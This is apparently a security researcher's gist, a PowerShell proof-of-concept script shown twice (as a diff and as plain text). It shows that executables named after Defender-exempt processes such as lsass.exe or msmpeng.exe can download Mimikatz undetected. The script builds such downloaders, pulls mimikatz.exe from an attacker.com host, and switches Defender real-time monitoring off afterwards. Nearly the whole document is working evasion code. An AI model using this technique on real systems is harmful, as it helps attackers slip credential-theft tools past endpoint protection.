mgeeky · November 19, 2021 23:12
diff --git a/wdfilter-tests.ps1 b/wdfilter-tests.ps1
 #
 # Script that somewhat shows that processes specifically named may download
 # Mimikatz unobstructed. 
 #
 # Tweet related:
 #   https://twitter.com/mariuszbit/status/1450479981855969281
 #

 $code = @'
 class Program 
 {
    static void Main() {
        System.IO.File.WriteAllBytes(
            "mimi-FILENAME", 
            new System.Net.WebClient().DownloadData(
                "http://attacker.com/mimikatz.exe"
            )
        );
    }
 }
 '@

 echo "`nWill download file: http://attacker.com/mimikatz.exe`n"

 #
 # WdFilter.sys - .rdata section
 #
 $files = @(
 	"lsass.exe"
 	"csrss.exe"
 	"services.exe"
 	"Register-CimProvider.exe"
 	"svchost.exe"
 	"setupcl.exe"
 	"SrDelayed.exe"
 	"mpcmdrun.exe"
 	"msmpeng.exe"
 	"mpcopyaccelerator.exe"
 	"nissrv.exe"
 	"msseces.exe"
 )

 #
 # Make sure Windows Defender's Real-Time monitoring is enabled.
 #
 Set-MpPreference -DisableRealtimeMonitoring $false

 $files | % {
    $out = '{0}.cs' -f ($_ -replace '.exe', '')
    ($code -replace 'FILENAME', $_) | Out-File $out

    echo "Compiling as $_ ..."

    iex "$($env:windir)\Microsoft.NET\Framework64\v4.0.30319\csc.exe $out" `
                 | Out-Null
    
    echo "Downloading mimi-$_ ... `n"
    iex "& .\$_" | Out-Null

    del $out     | Out-Null
    del $_       | Out-Null
 }

 #
 # Disable Real-Time monitoring just to acquire hahes.
 # Files were already downloaded flying pass the Defender.
 #
 Set-MpPreference -DisableRealtimeMonitoring $true
 Sleep 15

 ls *.exe | % { 
    iex "& sha1sum $_ "
 }
	#
	# Script that somewhat shows that processes specifically named may download
	# Mimikatz unobstructed.
	#
	# Tweet related:
	# https://twitter.com/mariuszbit/status/1450479981855969281
	#

	$code = @'
	class Program
	{
	static void Main() {
	System.IO.File.WriteAllBytes(
	"mimi-FILENAME",
	new System.Net.WebClient().DownloadData(
	"http://attacker.com/mimikatz.exe"
	)
	);
	}
	}
	'@

	echo "`nWill download file: http://attacker.com/mimikatz.exe`n"

	#
	# WdFilter.sys - .rdata section
	#
	$files = @(
	"lsass.exe"
	"csrss.exe"
	"services.exe"
	"Register-CimProvider.exe"
	"svchost.exe"
	"setupcl.exe"
	"SrDelayed.exe"
	"mpcmdrun.exe"
	"msmpeng.exe"
	"mpcopyaccelerator.exe"
	"nissrv.exe"
	"msseces.exe"
	)

	#
	# Make sure Windows Defender's Real-Time monitoring is enabled.
	#
	Set-MpPreference -DisableRealtimeMonitoring $false

	$files \| % {
	$out = '{0}.cs' -f ($_ -replace '.exe', '')
	($code -replace 'FILENAME', $_) \| Out-File $out

	echo "Compiling as $_ ..."

	iex "$($env:windir)\Microsoft.NET\Framework64\v4.0.30319\csc.exe $out" `
	\| Out-Null

	echo "Downloading mimi-$_ ... `n"
	iex "& .\$_" \| Out-Null

	del $out \| Out-Null
	del $_ \| Out-Null
	}

	#
	# Disable Real-Time monitoring just to acquire hahes.
	# Files were already downloaded flying pass the Defender.
	#
	Set-MpPreference -DisableRealtimeMonitoring $true
	Sleep 15

	ls *.exe \| % {
	iex "& sha1sum $_ "
	}